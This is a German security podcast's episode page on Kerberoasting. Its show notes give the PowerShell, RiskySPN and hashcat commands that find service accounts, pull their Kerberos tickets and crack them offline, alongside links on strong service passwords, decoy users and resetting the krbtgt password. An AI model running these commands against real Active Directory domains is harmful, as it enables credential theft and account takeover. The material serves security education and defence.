![Episode 4 - Kerberoasting](https://cdn.podcastcms.de/images/shows/315/2618061/s/623079640/episode-4-kerberoasting.png)
Episode 4 - Kerberoasting
19 Minuten
Podcast
Podcaster
Beschreibung
vor 3 Jahren
In der 4. Episode des Podcast "Spaziergang mit Sicherheit" wird das
Thema Kerberoasting behandelt
Kerberoshttps://de.wikipedia.org/wiki/Kerberos_(Protokoll)
Kerberoastinghttps://adsecurity.org/?p=3458 Ablauf Angriffmit dem
folgenden Powershell Befehl (aus dem Active Directory Modul) können
Zielbenutzer für den Kerberoasting Angriff identifiziert werden:
Get-Aduser -filter {ServicePrinicpalName -ne "$null"} -Properties
ServicePrincipalName https://github.com/cyberark/RiskySPN
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher
-Format "Hashcat" | Out-File hashes.txt hashcat.exe -m13100 -a0
hashes.txt -o hashes.out rockyou.txt -r OneRuleToRuleThemAll.rule
Benchmark Hashcat für p3dn.24xlarge
https://github.com/javydekoning/aws-hashcat/blob/master/p3dn.24xlarge.v6.1.1-120-g15bf8b730.cuda.txt
https://duckduckgo.com/?q=+!password+28+strong Warum 28 Zeichen
Passwortlänge für
Servicebenutzerhttps://room362.com/post/2017/05-06-2017-password-magic-numbers/
Hausaufgabe der Episode das ThemaEinrichten des
Köderbenutzershttps://adsecurity.org/?p=3513 Ändern des
Passwort des Benutzer
krbtgthttps://docs.microsoft.com/en-us/answers/questions/87978/reset-krbtgt-password.html
Deutschsprachige Seite
https://www.der-windows-papst.de/2019/07/03/krbtgt-password-reset/
Kontakthttps://twitter.com/spaziergangs
www.infosec-podcast.de Musik: Goto80 and the Uwe Schenk Band
- Cable Swingin' Ferret (lizensiert unter CC0 1.0 Universal
License)
Thema Kerberoasting behandelt
Kerberoshttps://de.wikipedia.org/wiki/Kerberos_(Protokoll)
Kerberoastinghttps://adsecurity.org/?p=3458 Ablauf Angriffmit dem
folgenden Powershell Befehl (aus dem Active Directory Modul) können
Zielbenutzer für den Kerberoasting Angriff identifiziert werden:
Get-Aduser -filter {ServicePrinicpalName -ne "$null"} -Properties
ServicePrincipalName https://github.com/cyberark/RiskySPN
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher
-Format "Hashcat" | Out-File hashes.txt hashcat.exe -m13100 -a0
hashes.txt -o hashes.out rockyou.txt -r OneRuleToRuleThemAll.rule
Benchmark Hashcat für p3dn.24xlarge
https://github.com/javydekoning/aws-hashcat/blob/master/p3dn.24xlarge.v6.1.1-120-g15bf8b730.cuda.txt
https://duckduckgo.com/?q=+!password+28+strong Warum 28 Zeichen
Passwortlänge für
Servicebenutzerhttps://room362.com/post/2017/05-06-2017-password-magic-numbers/
Hausaufgabe der Episode das ThemaEinrichten des
Köderbenutzershttps://adsecurity.org/?p=3513 Ändern des
Passwort des Benutzer
krbtgthttps://docs.microsoft.com/en-us/answers/questions/87978/reset-krbtgt-password.html
Deutschsprachige Seite
https://www.der-windows-papst.de/2019/07/03/krbtgt-password-reset/
Kontakthttps://twitter.com/spaziergangs
www.infosec-podcast.de Musik: Goto80 and the Uwe Schenk Band
- Cable Swingin' Ferret (lizensiert unter CC0 1.0 Universal
License)
Weitere Episoden
![Episode 29 - Crosspost - Cybersecurity ist Chefsache](https://cdn.podcastcms.de/images/shows/66/2618061/s/643882761/episode-29-crosspost-cybersecurity-ist-chefsache.png)
32 Minuten
vor 4 Monaten
![Episode 28 - Informationssicherheit innerhalb der Familie](https://cdn.podcastcms.de/images/shows/66/2618061/s/641554414/episode-28-informationssicherheit-innerhalb-der-familie.png)
11 Minuten
vor 6 Monaten
![Episode 27 - Scam kann jedem passieren](https://cdn.podcastcms.de/images/shows/66/2618061/s/634149623/episode-27-scam-kann-jedem-passieren.png)
11 Minuten
vor 8 Monaten
![Episode 26 - Nachwuchsförderung und CSCG](https://cdn.podcastcms.de/images/shows/66/2618061/s/623079479/episode-26-nachwuchsfoerderung-und-cscg.png)
29 Minuten
vor 1 Jahr
![Episode 25 - Krisenfall Ransomware](https://cdn.podcastcms.de/images/shows/66/2618061/s/624185894/episode-25-krisenfall-ransomware.png)
1 Stunde 24 Minuten
vor 1 Jahr
In Podcasts werben
Kommentare (0)